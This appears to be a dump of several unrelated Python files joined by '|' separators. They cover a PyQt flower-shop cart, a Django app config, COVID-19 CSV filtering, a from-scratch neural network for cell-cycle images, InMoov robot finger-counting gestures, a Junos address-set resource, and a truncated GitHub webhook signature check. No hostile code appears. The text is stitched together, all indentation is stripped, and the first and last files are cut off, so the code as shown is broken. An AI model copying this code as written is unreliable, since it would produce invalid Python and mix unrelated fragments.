def UpdatePrice(self): #update the price in the GUI.
ctr=self.tableWidget_Cart.rowCount()
self.price=0.00
while ctr!=0:
self.price=self.price+float(self.tableWidget_Cart.item(ctr-1,2).text())
ctr=ctr-1
self.label_Total.setText("Total amount in cart:"+str(self.price))
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Flower Shop", None))
self.label_stock.setText(_translate("MainWindow", "Available in stock", None))
self.btn_Great.setText(_translate("MainWindow", ">", None))
self.btn_Reset.setText(_translate("MainWindow", "Reset", None))
self.btn_Load.setText(_translate("MainWindow", "Load", None))
item = self.tableWidget_Cart.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Name", None))
item = self.tableWidget_Cart.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Quantity", None))
item = self.tableWidget_Cart.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "Price", None))
self.label_Total.setText(_translate("MainWindow", "Total amount in cart: P 0.00", None))
self.btn_Search.setText(_translate("MainWindow", "Search", None))
self.btn_Less.setText(_translate("MainWindow", "<", None))
self.btn_Purchase.setText(_translate("MainWindow", "Purchase", None))
item = self.tableWidget_Stock.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Name", None))
item = self.tableWidget_Stock.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Number available", None))
item = self.tableWidget_Stock.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "Price per piece", None))
self.label_4.setText(_translate("MainWindow", " ", None))
self.label_cart.setText(_translate("MainWindow", "Cart", None))
self.menuUser.setTitle(_translate("MainWindow", "User", None))
self.menuHelp.setTitle(_translate("MainWindow", "Help", None))
self.actionAbout.setText(_translate("MainWindow", "About", None))
self.actionHelp.setText(_translate("MainWindow", "Help", None))
self.actionAccount_info.setText(_translate("MainWindow", "Account info", None))
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
from django.apps import AppConfig
class ContaCorrenteConfig(AppConfig):
name = 'conta_corrente'
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 2 10:55:54 2020
@author: Administrator
"""
import csv
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.dates as mdate
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
from matplotlib.ticker import FormatStrFormatter
#用reder读取csv文件
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_same_province(str, Province):
province = str[4]
city = str[5]
countryCode = str[2]
#print(str[0])
if province == Province and city == '' and countryCode == 'CN':
# print(province,' ', city)
return True
else:
return False
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_same_country(str, Country):
countrycode = str[2]
provinceCode = str[4]
city = str[5]
#print(str[0])
if countrycode == Country and provinceCode == '' and city == '' :
# print(Country,' ', provinceCode)
return True
else:
return False
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_between_time(str, start):
date2num = mdate.strpdate2num('%Y-%m-%d')
if str[0] == 'date':
return False
else:
datetime2 = date2num(str[0])
#print(datetime2, 'datetime in else -------')
if datetime2 == float(start):
# print(datetime2)
return True
else:
return False
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_not_china(str, Country):
countrycode = str[2]
provinceCode = str[4]
city = str[5]
# dateTime = date2num(str[0])
if countrycode != Country and provinceCode == '' and city == '' :
# if dateTime == float(737394):
# count++
# print(Country,' ', provinceCode)
return True
else:
return False
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_not_Hubei(str, CountryCode):
countrycode = str[2]
province = str[3]
provinceCode = str[4]
city = str[5]
# dateTime = date2num(str[0])
if countrycode == CountryCode and province!= '' and provinceCode != '420000' and city == '' :
# if dateTime == float(737394):
# count++
# print(city,' ', provinceCode)
return True
else:
return False
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_country(str):
province = str[3]
provinceCode = str[4]
city = str[5]
cityCode = str[6]
# dateTime = date2num(str[0])
if province == '' and provinceCode == '' and city == '' and cityCode == '':
# if dateTime == float(737394):
# count++
# print(str[1],' ', str[2])
return True
else:
return False
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_china(str, Country):
countryCode = str[2]
provinceCode = str[4]
city = str[5]
# dateTime = date2num(str[0])
if countryCode == Country and provinceCode == '' and city == '' :
# if dateTime == float(737394):
# count++
# print(Country,' ', provinceCode)
return True
else:
return False
def filter_China(filename,resultfile,ProvinceCode):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_same_province(line, ProvinceCode):
#print(line)
writer.writerow(line)
filetowrite.close()
def filter_foreign(filename,resultfile,CountryCode):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_same_country(line, CountryCode):
#print(line)
writer.writerow(line)
filetowrite.close()
def confirm_date(date1,text1):
date2num = mdate.strpdate2num('%Y-%m-%d')
n = 0
while date2num(date1) > float(text1 + n):
n = n + 1
# print('confirm_data function:', n, date2num(date1), float(text1 + n))
return n
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def filter_date(filename,resultfile, dateRange):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
date2num = mdate.strpdate2num('%Y-%m-%d')
# date2str= str2date.strftime('%Y-%m-%d')
num1 = 0
num = 0
#dateRange1 = int( date2num(dateRange) - date2num('2019-12-01')); num = num1 = 0
k = 0
sum_temp1 = [0] * 200 # five months
sum_temp2 = [0] * 200
sum_temp3 = [0] * 200
sum_temp4 = [0] * 200
j = 0
# sum_date = []
for line in reader:
# print(line)
list2 = []
if k < 0:
k = k + 1
else:
if k == 0:
num1 = confirm_date(line[0], float(737394))
if is_between_time(line, 737394 + num1):
# print('--------if k==1 between---------', sum_temp1,'buchongshu',num1)
sum_temp1[j] = sum_temp1[j] + int(line[7])
sum_temp2[j] = sum_temp2[j] + int(line[8])
sum_temp3[j] = sum_temp3[j] + int(line[9])
sum_temp4[j] = sum_temp4[j] + int(line[10])
num = num1
k = 10000000000
# print('sum_temp line[7]', j, line[7], sum_temp1[j],'buchongshu',num1, num, k)
else:
num1 = confirm_date(line[0], float(737394))
# print(num1,num,'else fenzhi -=---==-================')
if num < num1 :
# k = 10000000
list2.append(mdate.num2date(737394 + num).strftime('%Y-%m-%d'))
list2.append(sum_temp1[j])
list2.append(sum_temp2[j])
list2.append(sum_temp3[j])
list2.append(sum_temp4[j])
# print(list2)
writer.writerow(list2)
j = j + 1
if is_between_time(line, 737394 + num1):
# print('--------else if between---------', sum_temp1)
sum_temp1[j] = sum_temp1[j] + int(line[7])
sum_temp2[j] = sum_temp2[j] + int(line[8])
sum_temp3[j] = sum_temp3[j] + int(line[9])
sum_temp4[j] = sum_temp4[j] + int(line[10])
# print('sum_temp[j] line[7] j', j, line[7], sum_temp1[j])
num = num1
elif num == num1:
if is_between_time(line, 737394 + num1):
# print('--------else else between---------', sum_temp1)
# sum_temp[j] = sum_temp[j] + int(line[7])
sum_temp1[j] = sum_temp1[j] + int(line[7])
sum_temp2[j] = sum_temp2[j] + int(line[8])
sum_temp3[j] = sum_temp3[j] + int(line[9])
sum_temp4[j] = sum_temp4[j] + int(line[10])
num = num1
# print('sum_temp[j] line[7]', j, line[7], sum_temp1[j])
list2 = []
list2.append(mdate.num2date(737394 + num1).strftime('%Y-%m-%d'))
list2.append(sum_temp1[j])
list2.append(sum_temp2[j])
list2.append(sum_temp3[j])
list2.append(sum_temp4[j])
# print(list2)
writer.writerow(list2)
# sum_foreign.append(sum_temp)
# writer.writerow(sum_foreign)
filetowrite.close()
def get_suspected_num(filename,resultfile):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_country(line):
#print(line)
writer.writerow(line)
filetowrite.close()
def full_of_all(filename,resultfile):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_country(line):
#print(line)
writer.writerow(line)
filetowrite.close()
def full_foreign(filename,resultfile,CountryCode):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_not_china(line, CountryCode):
#print(line)
writer.writerow(line)
filetowrite.close()
def full_china(filename,resultfile,CountryCode):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_china(line, CountryCode):
#print(line)
writer.writerow(line)
filetowrite.close()
def full_without_hubei(filename,resultfile,CountryCode):
reader = csv.reader(open(filename,encoding='utf-8'))
filetowrite = open(resultfile,'w', newline='',encoding='utf-8')
writer = csv.writer(filetowrite)
for line in reader:
if is_not_Hubei(line, CountryCode):
#print(line)
writer.writerow(line)
filetowrite.close()
#def full_of_all(filename,resultfile):
# reader = csv.reader(open(filename))
# filetowrite = open(resultfile,'w', newline='')
# writer = csv.writer(filetowrite)
# for line in reader:
# if is_country(line):
# #print(line)
# writer.writerow(line)
# filetowrite.close()
def get_province(filename,mainFile):
reader = csv.reader(open(filename,encoding='utf-8'))
for line in reader:
dstFile = 'Province/'+line[2]+'.csv'
# print(dstFile)
filter_China(mainFile,dstFile,line[1])
def get_country(filename,mainFile):
readerC = csv.reader(open(filename,encoding='utf-8'))
for line in readerC:
dstFile = 'Country/'+line[2]+'.csv'
# print(dstFile)
filter_foreign(mainFile,dstFile,line[1])
def get_full_foreign(mainFile):
dstFile = 'FullWithoutChina/FullWithoutChina.csv'
full_foreign(mainFile,dstFile,'CN')
def get_full_china(mainFile):
dstFile = 'FullChina/FullChina.csv'
full_china(mainFile,dstFile,'CN')
def get_full_without_Hubei(mainFile):
dstFile = 'FullWithoutHubei/FullWithoutHubei.csv'
full_without_hubei(mainFile,dstFile,'CN')
def get_total(mainFile):
dstFile = 'FULL/FULL.csv'
full_of_all(mainFile,dstFile)
def main_data_prepare(fileNameOfAll, dateTime):
get_full_china(fileNameOfAll)
filter_date('FullChina/FullChina.csv','DateOrder/TimeTestFullChina.csv', dateTime)
get_full_foreign(fileNameOfAll)
filter_date('FullWithoutChina/FullWithoutChina.csv','DateOrder/TimeTestFullForeign.csv', dateTime)
get_full_without_Hubei(fileNameOfAll)
filter_date('FullWithoutHubei/FullWithoutHubei.csv','DateOrder/TimeTestWithoutHubei.csv', dateTime)
get_total(fileNameOfAll)
filter_date('FULL/FULL.csv','DateOrder/TimeTestFULL.csv', dateTime)
get_province('ProvinceCode.csv',fileNameOfAll)
get_country('CountryCode.csv',fileNameOfAll)
if __name__ == '__main__':
fileNameOfAll='Wuhan-2019-nCoV.csv'
# filter_foreign(fileNameOfAll,'Country/The Republic of Namibia.csv','The Republic of Namibia')
dateTime='2020-03-21'
get_full_foreign(fileNameOfAll)
filter_date('FullWithoutChina/FullWithoutChina.csv','DateOrder/TimeTestFullForeign.csv', dateTime)
# filter_China('Wuhan-2019-nCoV.csv','Province/Xizang.csv','540000')
# confirm_date('2020-01-02', float(737394) )
# print('---------------------------------EEEEEEEEEEEEEEEEE------------------------')
# get_full_china('Wuhan-2019-nCoV.csv')
# filter_date('FullChina/FullChina.csv','DateOrder/TimeTestFullChina.csv', '2020-03-03')
# get_full_foreign('Wuhan-2019-nCoV.csv')
# filter_date('FullWithoutChina/FullWithoutChina.csv','DateOrder/TimeTestFullForeign.csv', '2020-03-03')
# get_full_without_Hubei('Wuhan-2019-nCoV.csv')
# filter_date('FullWithoutHubei/FullWithoutHubei.csv','DateOrder/TimeTestWithoutHubei.csv', '2020-03-03')
# get_total('Wuhan-2019-nCoV.csv')
# filter_date('FULL/FULL.csv','DateOrder/TimeTestFULL.csv', '2020-03-03')
# |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from scipy.stats import truncnorm
import pickle
import os
from sklearn import preprocessing
import scipy.io as sio
import matplotlib.gridspec as gridspec
import progressbar
from pprint import pprint
import copy
import time
FRAME_SIZE = 140
test_epochs=[10,25,50,75,90,100,200,250,300,400,500]
#test_epochs=[1,5,10,25,50,100]
def truncated_normal(mean, sd, low, upp):
return truncnorm((low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)
def sigmoid(x):
return (1 / (1 + np.exp(-x)))
activation_function = sigmoid
class NeuralNetwork:
def __init__(self,
network_structure, # ie. [input_nodes, hidden1_nodes, ... , hidden_n_nodes, output_nodes]
learning_rate,
bias=None
):
self.structure = network_structure
self.learning_rate = learning_rate
self.bias = bias
self.create_weight_matrices()
def create_weight_matrices(self):
X = truncated_normal(mean=2, sd=1, low=-0.5, upp=0.5)
bias_node = 1 if self.bias else 0
self.weights_matrices = []
layer_index = 1
no_of_layers = len(self.structure)
while layer_index < no_of_layers:
nodes_in = self.structure[layer_index-1]
nodes_out = self.structure[layer_index]
n = (nodes_in + bias_node) * nodes_out
rad = 1 / np.sqrt(nodes_in)
X = truncated_normal(mean=2, sd=1, low=-rad, upp=rad)
wm = X.rvs(n).reshape((nodes_out, nodes_in + bias_node))
self.weights_matrices.append(wm)
layer_index += 1
def train_single(self, input_vector, target_vector):
# input_vector and target_vector can be tuple, list or ndarray
no_of_layers = len(self.structure)
input_vector = np.array(input_vector, ndmin=2).T
layer_index = 0
# The output/input vectors of the various layers:
res_vectors = [input_vector]
while layer_index < no_of_layers - 1:
in_vector = res_vectors[-1]
# adding bias node to the end of the 'input'_vector
if self.bias:
in_vector = np.concatenate((in_vector,[[self.bias]]))
res_vectors[-1] = in_vector
x = np.dot(self.weights_matrices[layer_index], in_vector)
out_vector = activation_function(x)
res_vectors.append(out_vector)
layer_index += 1
layer_index = no_of_layers - 1
target_vector = np.array(target_vector, ndmin=2).T
# The input vectors to the various layers
output_errors = target_vector - out_vector
while layer_index > 0:
out_vector = res_vectors[layer_index]
in_vector = res_vectors[layer_index-1]
if self.bias and not layer_index==(no_of_layers-1):
out_vector = out_vector[:-1,:].copy()
tmp = output_errors * out_vector * (1.0 - out_vector)
tmp = np.dot(tmp, in_vector.T)
self.weights_matrices[layer_index-1] += self.learning_rate * tmp
output_errors = np.dot(self.weights_matrices[layer_index-1].T,output_errors)
if self.bias:
output_errors = output_errors[:-1,:]
layer_index -= 1
def train(self, data_array,
labels_one_hot_array,
epochs=1,
intermediate_results=False):
bar = progressbar.ProgressBar(maxval=epochs, widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])
bar.start()
intermediate_weights = []
count=1
for epoch in range(epochs):
for i in range(len(data_array)):
self.train_single(data_array[i], labels_one_hot_array[i])
if (count in test_epochs):
intermediate_weights.append(copy.deepcopy(self.weights_matrices))
bar.update(count)
count += 1
bar.finish()
return intermediate_weights
def run(self, input_vector):
# input_vector can be tuple, list or ndarray
no_of_layers = len(self.structure)
# adding bias node to the end of the inpuy_vector
if self.bias:
input_vector = np.concatenate( (input_vector, [self.bias]) )
in_vector = np.array(input_vector, ndmin=2).T
layer_index = 1
# The input vectors to the various layers
while layer_index < no_of_layers:
x = np.dot(self.weights_matrices[layer_index-1],in_vector)
out_vector = activation_function(x)
# input vector for next layer
in_vector = out_vector
if self.bias:
in_vector = np.concatenate( (in_vector,[[self.bias]]) )
layer_index += 1
return out_vector
def evaluate(self, data, labels):
corrects, wrongs = 0, 0
for i in range(len(data)):
res = self.run(data[i])
res_max = res.argmax()
if res_max == labels[i]:
corrects += 1
else:
wrongs += 1
return corrects, wrongs
def precision(self, label, confusion_matrix):
col = confusion_matrix[:, label]
return confusion_matrix[label, label] / col.sum()
def recall(self, label, confusion_matrix):
row = confusion_matrix[label, :]
return confusion_matrix[label, label] / row.sum()
def set_class(x):
if x == 'G1':
return 0
elif ('S' in x and 'G1' in x):
return 1
elif x == 'S':
return 3
elif ('S' in x and 'G2' in x):
return 2
elif x == 'G2':
return 4
else:
return 5
def set_color(x):
if x == 'G1':
return 'red'
elif ('S' in x and 'G1' in x):
return 'yellow'
elif x == 'S':
return 'blue'
elif ('S' in x and 'G2' in x):
return 'orange'
elif x == 'G2':
return 'green'
else:
return 'black'
class Cell_Info:
def __init__(self,Matrix,CellCycle):
self.Matrix = Matrix
self.Index = np.asarray(np.where(Matrix>0)).T
self.y_min = min(self.Index[:,0])
self.y_max = max(self.Index[:,0])
self.x_min = min(self.Index[:,1])
self.x_max = max(self.Index[:,1])
self.Area = np.count_nonzero(self.Matrix)
self.Intensity = self.Matrix.sum()
self.CellCycle = str(CellCycle)
self.Class = set_class(str(CellCycle))
#_______________________________________________________________________________
#_______________________________________________________________________________
#_______________________________________________________________________________
#____________________________________MAIN_______________________________________
#_______________________________________________________________________________
#_______________________________________________________________________________
#_______________________________________________________________________________
if __name__ == "__main__":
new_data=0
if (new_data==1) :
count_files=0
count_cells = 0
dir = os.getcwd()
dirs=[]
dirs.append(dir)
for dir in dirs:
print("DIR: ",dir)
cells=[]
i=0 #Used to transverse the cells list when printing the images
for roots, dirs, files in os.walk(dir):
for file in files:
if file.endswith('.mat'):
path = os.path.realpath(os.path.join(roots,file))
print("PATH: ",path)
data = (sio.loadmat(path,struct_as_record=True))['storage']
for case in data:
count_cells += 1
if (set_class(case['CellCycle'][0][0]) < 3):
cells.append(Cell_Info(np.matrix(case['Mask'][0]),case['CellCycle'][0][0]))
count_files += 1
"""
#Routine used to print all cells from a mat file as an image
fig=plt.figure(frameon=False)
final_mask=np.zeros_like(cells[0].Matrix)
for index in range(i,len(cells)):
final_mask += cells[index].Matrix
i += 1
plt.imshow(final_mask, cmap='Blues',interpolation='nearest')
plt.show()
"""
print(count_files, "file(s) found")
print(count_cells, "cell(s) found,", len(cells), "cell(s) used")
"""
#Routine used to determine the maximum cell size and thus choose an
#appropriate input size (in this case 140x140)
pix_size=[]
for cell in cells:
pix_size.append([(cell.y_max-cell.y_min),(cell.x_max-cell.x_min)])
pix_size=np.array(pix_size)
print(np.amax(pix_size,axis=0))
"""
"""
#Routine used to check if all information is correct
print('=================================================')
for i in range(10):
print("Y:",cells[i].y_min,cells[i].y_max)#Y min and max
print("X:",cells[i].x_min,cells[i].x_max)#X min and max
print(cells[i].Intensity)
print(cells[i].Area)
print(cells[i].CellCycle)
print(cells[i].Class)
print('=================================================')
"""
#With all the cells cells in a list, and an input size chosen it is
#time to create the input for the neural network itself
treated_cells=[]
for cell in cells:
S_mask=np.zeros((FRAME_SIZE,FRAME_SIZE))
y_diff = cell.y_max - cell.y_min
x_diff = cell.x_max - cell.x_min
if (y_diff > FRAME_SIZE or x_diff > FRAME_SIZE):
print("Impossible to fit cell, please increase frame size")
else:
y_offset = int((FRAME_SIZE-y_diff)/2)
x_offset = int((FRAME_SIZE-x_diff)/2)
S_mask[y_offset:y_diff+y_offset+1,x_offset:x_diff+x_offset+1] = cell.Matrix[cell.y_min : cell.y_max+1, cell.x_min:cell.x_max+1]
treated_cells.append(Cell_Info(S_mask.astype(float),cell.CellCycle))
del cells
labeled_data = np.array([(cell.Matrix,int(cell.Class)) for cell in treated_cells])
fac = 255 *0.99 + 0.01
labeled_data[:,0]=labeled_data[:,0]/fac
#==============DATA RANDOMIZING===============
#np.random.shuffle(labeled_data)
size_of_learn_sample = int(len(labeled_data)*0.9)
train_data = labeled_data[:size_of_learn_sample]
test_data = labeled_data[size_of_learn_sample:]
#===============TRAINING DATA=================
train_labels = train_data[:,1].astype(int)
#train_labels = train_labels.reshape(train_labels.size,1).astype(int)
train_data = train_data[:,0]
#train_data = train_data.reshape(train_data.size,1)
#===============TESTING DATA===================
test_labels = test_data[:,1].astype(int)
#test_labels = test_labels.reshape(test_labels.size,1).astype(int)
test_data = test_data[:,0]
#test_data = test_data.reshape(test_data.size,1)
#=========================ONE HOT FORMAT=======================
no_of_different_labels = 3
train_labels_one_hot = np.zeros((train_labels.size,no_of_different_labels))
test_labels_one_hot = np.zeros((test_labels.size,no_of_different_labels))
train_labels_one_hot[np.arange(train_labels.size),train_labels.T] = 1
test_labels_one_hot[np.arange(test_labels.size),test_labels.T] = 1
train_labels_one_hot[train_labels_one_hot==0] = 0.01
train_labels_one_hot[train_labels_one_hot==1] = 0.99
test_labels_one_hot[test_labels_one_hot==0] = 0.01
test_labels_one_hot[test_labels_one_hot==1] = 0.99
#print(np.hstack((test_labels.reshape(test_labels.size,1).astype(int), test_labels_one_hot)))
#==================SAVING DATA===================================
with open("/Users/Rafa/Google Drive/Faculdade/Tese/Projecto/Treated_Data/pickled_cells.pkl", "bw") as fh:
data = (train_data,
test_data,
train_labels,
test_labels,
train_labels_one_hot,
test_labels_one_hot)
pickle.dump(data, fh)
else:
with open("/Users/Rafa/Google Drive/Faculdade/Tese/Projecto/Treated_Data/pickled_cells.pkl", "br") as fh:
data = pickle.load(fh)
train_data = data[0]
test_data = data[1]
train_labels = data[2]
test_labels = data[3]
train_labels_one_hot = data[4]
test_labels_one_hot = data[5]
for i in range(len(train_data)):
train_data[i]=train_data[i].ravel()
for i in range(len(test_data)):
test_data[i]=test_data[i].ravel()
epochs = 500
#test_epochs=[500,1000,5000,10000,15000,20000,25000,30000]
image_size=FRAME_SIZE*FRAME_SIZE
ANN = NeuralNetwork(network_structure=[image_size,500,500, 3],
learning_rate=0.01,
bias=1)
start_time = time.time()
print("Start time:",time.strftime("%H:%M:%S", time.gmtime(start_time)))
print("Epochs: ",epochs, "\tTraining Size: ",len(train_data),"\tStructure: ",ANN.structure,"\tBias: ",ANN.bias,"\tLearning Rate: ",ANN.learning_rate)
matrices=ANN.train(train_data, train_labels_one_hot, epochs=epochs, intermediate_results=True)
elapsed_time = time.time() - start_time
print("Elapsed time:",time.strftime("%H:%M:%S", time.gmtime(elapsed_time)))
"""
print("============================================================================================")
corrects, wrongs = ANN.evaluate(train_data, train_labels)
print("accuracy train: ", corrects / ( corrects + wrongs))
corrects, wrongs = ANN.evaluate(test_data, test_labels)
print("accuracy test: ", corrects / ( corrects + wrongs))
"""
i=0
print("============================================================================================")
for element in matrices:
ANN.weights_matrices = element
print("Epochs: ",test_epochs[i])
corrects, wrongs = ANN.evaluate(train_data, train_labels)
print("accuracy train: ", corrects / ( corrects + wrongs))
corrects, wrongs = ANN.evaluate(test_data, test_labels)
print("accuracy: test", corrects / ( corrects + wrongs))
print("============================================================================================")
i += 1
|
#Each gesture correspond to a number showed by the hand
def oneFinger():
#i01.startedGesture()
rest()
i01.moveHead(64.00,94.00,76.93,58.72,0.00,129.00)
i01.moveArm("left",90.00,60.00,83.00,15.00)
i01.moveArm("right",5.20,90.20,30.20,12.20)
sleep(2.5)
i01.moveHand("left",0.00,180.00,180.00,180.00,180.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def twoFinger():
i01.startedGesture()
rest()
i01.moveHead(64.00,94.00,95.00,90.00,0.00,38.00)
i01.moveArm("left",90.00,60.00,83.00,15.00)
i01.moveArm("right",5.20,90.20,30.20,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,180.00,180.00,180.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def threeFinger():
i01.startedGesture()
rest()
i01.moveHead(64.00,94.00,95.00,90.00,0.00,129.00)
i01.moveArm("left",80.00,66.00,83.00,10.00)
i01.moveArm("right",5.20,90.20,30.20,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,180.00,180.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def fourFinger():
i01.startedGesture()
rest()
i01.moveHead(43.00,94.00,90.00,90.00,0.00,129.00)
i01.moveArm("left",80.00,58.00,75.00,10.00)
i01.moveArm("right",5.20,90.20,30.20,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,180.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def fiveFinger():
i01.startedGesture()
rest()
i01.moveHead(46.00,90.00,122.17,64.06,0.00,74.37)
i01.moveArm("left",88.00,58.00,75.00,10.00)
i01.moveArm("right",5.20,90.20,30.20,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def sixFinger():
i01.startedGesture()
rest()
i01.moveHead(46.00,73.00,122.17,64.06,0.00,21.00)
i01.moveArm("left",88.00,58.00,75.00,10.00)
i01.moveArm("right",90.00,90.20,55.00,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveHand("right",0.00,180.00,180.00,180.00,180.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def sevenFinger():
i01.startedGesture()
rest()
i01.moveHead(90.00,70.00,122.17,64.06,0.00,21.00)
i01.moveArm("left",55.00,58.00,75.00,10.00)
i01.moveArm("right",90.00,90.20,55.00,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveHand("right",0.00,0.00,180.00,180.00,180.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def eightFinger():
i01.startedGesture()
rest()
i01.moveHead(72.00,64.00,122.17,64.06,0.00,0.00)
i01.moveArm("left",86.00,58.00,75.00,16.00)
i01.moveArm("right",90.00,93.00,58.00,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,180.00,180.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def nineFinger():
i01.startedGesture()
rest()
i01.moveHead(72.00,64.00,122.17,64.06,0.00,0.00)
i01.moveArm("left",86.00,58.00,75.00,16.00)
i01.moveArm("right",90.00,93.00,58.00,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,180.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
def tenFinger():
i01.startedGesture()
rest()
i01.moveHead(72.00,64.00,122.17,64.06,0.00,0.00)
i01.moveArm("left",86.00,58.00,75.00,16.00)
i01.moveArm("right",90.00,93.00,58.00,12.20)
sleep(2.5)
i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
i01.moveTorso(90.20,90.20,90.00)
sleep(2)
i01.finishedGesture()
relax()
|
# 3rd-party modules
from lxml.builder import E
# module packages
from ... import jxml as JXML
from .. import Resource
class SharedAddrBookSet( Resource ):
"""
[edit security address-book <ab_name> address-set <name>]
~! WARNING !~
This resource is managed only as a child of the :ZoneAddrBook:
resource. Do not create a manager instance of this class directly
"""
PROPERTIES = [
'description',
'addr_list', # list of address items
'set_list', # sets can contain a list of sets
]
def _xml_at_top(self):
xml = self.P._xml_at_top()
xml.find('.//address-book').append(
E('address-set',E.name(self._name))
)
return xml
##### -----------------------------------------------------------------------
##### XML reading
##### -----------------------------------------------------------------------
def _xml_at_res(self, xml):
return xml.find('.//address-book/address-set')
def _xml_to_py(self, as_xml, to_py ):
Resource._r_has_xml_status( as_xml, to_py )
Resource.copyifexists( as_xml, 'description', to_py )
to_py['addr_list'] = [name.text for name in as_xml.xpath('address/name')]
to_py['set_list'] = [name.text for name in as_xml.xpath('address-set/name')]
##### -----------------------------------------------------------------------
##### XML writing
##### -----------------------------------------------------------------------
def _xml_change_addr_list( self, xml ):
self._xml_list_property_add_del_names( xml,
prop_name='addr_list', element_name='address')
return True
def _xml_change_set_list( self, xml ):
self._xml_list_property_add_del_names( xml,
prop_name='set_list',element_name='address-set')
return True
##### -----------------------------------------------------------------------
##### Manager List, Catalog
##### -----------------------------------------------------------------------
def _r_list(self):
# list of address-book address-sets. this list is managed by the
# parent object, so just use that, yo!
self._rlist = self.P['$sets']
def _r_catalog(self):
get = self.P._xml_at_top()
get.find('.//address-book').append(E('address-set'))
got = self.D.rpc.get_config(get)
for adrset in got.xpath('.//address-set'):
name = adrset.find('name').text
self._rcatalog[name] = {}
self._xml_to_py( adrset, self._rcatalog[name] )
|
import json
import requests
from flask import request
from mattermostgithub import config, app
import hmac
import hashlib
SECRET = hmac.new(config.SECRET, digestmod=hashlib.sha1) if config.SECRET else None
def check_signature_githubsecret(signature, secret, payload):
sig2 = secret.copy()
sig2.update(payload)
